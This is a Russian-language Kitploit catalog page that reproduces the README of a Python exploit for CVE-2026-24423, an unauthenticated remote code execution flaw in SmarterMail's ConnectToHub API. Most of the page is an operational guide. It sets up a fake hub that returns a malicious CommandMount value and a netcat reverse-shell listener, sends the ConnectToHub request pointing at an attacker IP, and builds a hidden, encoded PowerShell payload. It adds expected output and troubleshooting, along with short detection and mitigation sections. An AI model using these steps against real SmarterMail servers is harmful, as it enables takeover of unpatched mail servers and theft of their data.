Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SmarterMail-CVE-2026-24423 — Эксплойт для CVE-2026-24423 — критическая неаутентифицированная RCE-уязвимость в API ConnectToHub продукта SmarterMail. Затрагивает все сборки до 9511. | Kitploit
Инструменты/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubcyberalp0/smartermail-cve-2026-24423

SmarterMail-CVE-2026-24423

Эксплойт для CVE-2026-24423 — критическая неаутентифицированная RCE-уязвимость в API ConnectToHub продукта SmarterMail. Затрагивает все сборки до 9511.

Репозиторий
17 ч 2 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SmarterMail ConnectToHub RCE

Python-эксплойт для CVE-2026-24423 — неаутентифицированной уязвимости удалённого выполнения кода в функциональности ConnectToHub продукта SmarterTools SmarterMail.

Предназначение: Только авторизованное тестирование безопасности, CTF, лаборатории Hack The Box и контролируемые исследовательские среды.


Содержание

  • Обзор
  • Детали CVE
  • Затронутые версии
  • Описание уязвимости
  • Технические детали
  • Схема эксплуатации
  • Требования
  • Конфигурация
  • Использование
  • Ожидаемый результат
  • Устранение неполадок
  • Скриншоты
  • Структура проекта
  • Смягчение последствий
  • Ссылки
  • Отказ от ответственности

Обзор

CVE-2026-24423 — это неаутентифицированная уязвимость удалённого выполнения кода, затрагивающая SmarterTools SmarterMail.

Уязвимость существует в функциональности . Неаутентифицированный злоумышленник может указать вредоносный , в результате чего сервер SmarterMail выполнит HTTP-запрос к серверу, контролируемому злоумышленником.

ConnectToHub
hubAddress

Вредоносный сервер отвечает сформированным ответом setup-initial-connection, содержащим контролируемое значение SystemMount.CommandMount.

Уязвимый экземпляр SmarterMail впоследствии обрабатывает это значение как команду операционной системы, что позволяет выполнять произвольные команды в контексте безопасности службы SmarterMail.

Уязвимости присвоена оценка CVSS 4.0 — 9.3 (критическая), и она классифицирована как CWE-306: Отсутствие аутентификации для критической функции.


Детали CVE

ПолеЗначение
CVECVE-2026-24423
ПроизводительSmarterTools
ПродуктSmarterMail
УязвимостьНеаутентифицированное удалённое выполнение кода
CWECWE-306
CVSS v4.09.3 Критическая
CVSS v3.19.8 Критическая
Вектор атакиСеть
АутентификацияНе требуется
Взаимодействие с пользователемНе требуется
СложностьНизкая
Опубликовано23 января 2026 г.
Исправленная сборка9511

Официальная запись CVE описывает проблему как неаутентифицированное RCE через метод API ConnectToHub.


Затронутые версии

Уязвимы версии SmarterMail до Build 9511.

Запись CVE определяет затронутый диапазон как:

root@kitploit:~
SmarterMail < 100.0.9511

Сборка 9511, выпущенная 15 января 2026 г., содержит исправление производителя.

Уязвимые

root@kitploit:~
< 100.0.9511

Исправленные

root@kitploit:~
>= 100.0.9511

Всегда проверяйте точную установленную сборку перед попыткой воспроизведения уязвимости.


Описание уязвимости

Уязвимая функциональность доступна через API системного администрирования SmarterMail.

Соответствующая операция:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

Конечная точка принимает параметр hubAddress.

Концептуально злоумышленник может указать:

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

Затем SmarterMail подключается к указанному адресу хаба и запрашивает:

root@kitploit:~
/web/api/node-management/setup-initial-connection

Сервер, контролируемый злоумышленником, отвечает JSON, содержащим вредоносный объект SystemMount.

Важным свойством является:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

Значение CommandMount впоследствии используется уязвимым приложением как команда операционной системы.

Это позволяет злоумышленнику перейти от:

root@kitploit:~
Неаутентифицированный HTTP-запрос

к:

root@kitploit:~
Удалённое выполнение команд

Технический анализ VulnCheck подтверждает, что контролируемый злоумышленником hubAddress заставляет SmarterMail запрашивать конечную точку setup-initial-connection злоумышленника, а возвращаемый CommandMount может обеспечить произвольное выполнение команд.


Технические детали

Эксплойт состоит из двух компонентов:

1. Поддельный хаб SmarterMail

Python-сервер прослушивает:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

и возвращает сформированный JSON-ответ, содержащий вредоносный SystemMount.CommandMount.

2. Слушатель обратной оболочки

Отдельный TCP-слушатель принимает соединение, инициированное командой, выполненной на цели.

Этот эксплойт намеренно использует два отдельных порта.

root@kitploit:~
8081
└── Поддельный хаб SmarterMail

4455
└── Слушатель обратной оболочки

Схема эксплуатации

root@kitploit:~
flowchart LR

    A[Злоумышленник<br/>10.10.14.50]

    H[Поддельный хаб SmarterMail<br/>TCP/8081]

    T[Цель SmarterMail<br/>10.129.57.86]

    C[CommandMount<br/>Выполнение команд]

    P[PowerShell]

    L[Слушатель обратной оболочки<br/>TCP/4455]

    A -->|Запуск ConnectToHub| T
    T -->|HTTP POST| H
    H -->|Вредоносный JSON| T
    T -->|CommandMount| C
    C --> P
    P -->|Обратный TCP| L
    L --> A

Соединение 1 — Поддельный хаб

root@kitploit:~
Цель
   |
   | HTTP
   v
10.10.14.50:8081

Соединение 2 — Обратная оболочка

root@kitploit:~
Цель
   |
   | TCP
   v
10.10.14.50:4455

Эти порты служат разным целям, и их не следует путать.


Требования

  • Python 3
  • Атакующая машина на Linux
  • VPN Hack The Box или эквивалентная авторизованная сеть
  • Сетевая доступность от цели до атакующего
  • Netcat
  • Уязвимая установка SmarterMail

Эксплойт использует только модули стандартной библиотеки Python:

root@kitploit:~
http.server
json
base64

Внешние Python-пакеты не требуются.


Конфигурация

Отредактируйте следующие переменные:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

Для примера среды HTB:

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST — это IP-адрес атакующего, доступный для цели.

Для Hack The Box это обычно IP-адрес, назначенный VPN-интерфейсу HTB:

root@kitploit:~
ip addr show tun0

Пример:

root@kitploit:~
tun0:
    inet 10.10.14.50

Следовательно:

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT — это TCP-порт, используемый атакующим для приёма обратного соединения.

Пример:

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT — это HTTP-порт, используемый вредоносным хабом SmarterMail.

Пример:

root@kitploit:~
HUB_PORT = 8081

Использование

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. Настройка эксплойта

Отредактируйте:

root@kitploit:~
nano exploit.py

Установите:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. Запуск слушателя обратной оболочки

Откройте терминал:

root@kitploit:~
nc -lvnp 4455

Ожидаемый результат:

root@kitploit:~
Listening on 0.0.0.0 4455

Держите этот терминал открытым.


4. Запуск вредоносного хаба

Откройте второй терминал:

root@kitploit:~
python3 exploit.py

Если для привязки к выбранному порту требуются повышенные привилегии:

root@kitploit:~
sudo python3 exploit.py

Ожидаемый результат:

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] Waiting for SmarterMail...
============================================================

5. Запуск ConnectToHub

Отправьте соответствующий запрос к уязвимому экземпляру SmarterMail.

Указанный hubAddress должен указывать на вредоносный HTTP-сервер:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

Важным значением является:

root@kitploit:~
http://10.10.14.50:8081

Не используйте порт обратной оболочки в качестве порта хаба.


Сводка конфигурации портов

НазначениеIPПорт
VPN атакующего10.10.14.50—
Поддельный хаб SmarterMail10.10.14.508081
Обратная оболочка10.10.14.504455
Цель HTB10.129.57.86—

Результирующий поток:

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
Вредоносный CommandMount
    ↓
PowerShell
    ↓
10.10.14.50:4455

Кодирование полезной нагрузки

Эксплойт динамически создаёт полезную нагрузку PowerShell.

Параметр -EncodedCommand в PowerShell ожидает, что команда будет закодирована в UTF-16LE перед кодированием Base64.

Скрипт выполняет:

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

Итоговая команда имеет структуру:

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

Это позволяет избежать ручного кодирования полезной нагрузки и предотвращает типичные ошибки кодирования UTF-8/UTF-16LE.


Ожидаемый результат

Когда цель обращается к вредоносному хабу:

root@kitploit:~
[+] Received SmarterMail connection
[+] Path: /web/api/node-management/setup-initial-connection
[+] Body: ...
[+] Sending CommandMount payload
[+] Reverse shell -> 10.10.14.50:4455

Слушатель обратной оболочки должен впоследствии получить соединение:

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

После подключения можно выполнить базовую проверку:

root@kitploit:~
whoami
root@kitploit:~
hostname

Устранение неполадок

Поддельный хаб не получает соединение

Проверьте, что сервер прослушивает порт:

root@kitploit:~
ss -lntp | grep 8081

Проверьте VPN-адрес:

root@kitploit:~
ip addr show tun0

Убедитесь, что LHOST соответствует адресу, доступному с цели.


Поддельный хаб получает HTTP 200, но оболочки нет

Успешный HTTP-запрос означает, что первый этап работает:

root@kitploit:~
Цель
  |
  | HTTP
  v
Поддельный хаб :8081

Это не обязательно означает, что второй этап прошёл успешно.

Проверьте:

root@kitploit:~
ss -lntp | grep 4455

Убедитесь, что Netcat был запущен до запуска эксплойта.

Также проверьте:

root@kitploit:~
LHOST = доступный для цели IP атакующего
LPORT = порт слушателя

Netcat получает HTTP-запрос вместо оболочки

Если вы видите:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

внутри Netcat, значит, вы указали hubAddress на слушатель обратной оболочки.

Неправильно:

root@kitploit:~
hubAddress = http://10.10.14.50:4455

Правильно:

root@kitploit:~
hubAddress = http://10.10.14.50:8081

Два порта должны оставаться раздельными.


Ответ HTTP 400

Ответ 400 может возникнуть, когда поддельный хаб не возвращает структуру, ожидаемую SmarterMail.

Проверьте, что ответ содержит:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

Также убедитесь, что запрошенный путь точно такой:

root@kitploit:~
/web/api/node-management/setup-initial-connection

Публичный анализ уязвимости идентифицирует эту конечную точку как часть уязвимого потока ConnectToHub.


Скриншоты

Добавьте сюда скриншоты из лаборатории HTB.

1. Разведка цели

Пример:

root@kitploit:~
![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/nmap.png)

Рекомендуемые скриншоты:

  • Результаты Nmap
  • Служба/версия SmarterMail
  • Соответствующий открытый порт

2. Вредоносный хаб

root@kitploit:~
![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/fake-hub.png)

Покажите:

root@kitploit:~
[+] Received SmarterMail connection
[+] Sending CommandMount payload

3. Запуск эксплойта

root@kitploit:~
![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/burp-request.png)

Покажите запрос, содержащий:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. Обратная оболочка

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/reverse-shell.png)

Покажите:

root@kitploit:~
Connection received on 10.129.57.86

и результирующее приглашение командной строки.


Структура проекта

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

Обнаружение

Возможные индикаторы эксплуатации включают неожиданные запросы к:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

и исходящие соединения от сервера SmarterMail к ранее неизвестным HTTP-хостам.

Администраторам также следует проверять журналы приложения, IIS/обратного прокси и сетевые журналы на предмет подозрительной активности ConnectToHub.

CVE-2026-24423 включён в каталог Known Exploited Vulnerabilities CISA, что указывает на то, что эксплуатация наблюдалась за пределами лабораторных сред.


Смягчение последствий

Основное средство устранения — обновление SmarterMail до Build 9511 или новее. Релиз производителя от 15 января 2026 г. устранил уязвимость.

Если немедленное исправление невозможно, организациям следует дополнительно рассмотреть:

  • Ограничение доступа к административным API SmarterMail.
  • Предотвращение ненужного внешнего доступа к конечным точкам управления.
  • Применение сетевой сегментации.
  • Мониторинг исходящих соединений от сервера SmarterMail.
  • Проверку исторических журналов на предмет подозрительных запросов ConnectToHub.
  • Расследование неожиданного выполнения команд учётной записью службы SmarterMail.

Ссылки

  • Запись CVE: CVE-2026-24423
  • VulnCheck: SmarterMail ConnectToHub Unauthenticated RCE
  • CODE WHITE: Публичный список уязвимостей
  • Примечания к выпуску SmarterTools SmarterMail
  • Каталог Known Exploited Vulnerabilities CISA

Отказ от ответственности

Этот проект предоставляется только для авторизованных исследований в области безопасности и образовательных целей.

Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

Автор не несёт ответственности за неправомерное использование, ущерб, потерю данных, несанкционированный доступ или другие последствия, возникшие в результате использования этого программного обеспечения.

Используйте только в контролируемых средах, таких как:

  • Hack The Box
  • Соревнования Capture-the-Flag
  • Личные лаборатории
  • Авторизованные тесты на проникновение
  • Среды исследований в области безопасности

Авторы

CVE-2026-24423 была приписана:

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

CVE была опубликована VulnCheck 23 января 2026 г.

Скачать инструмент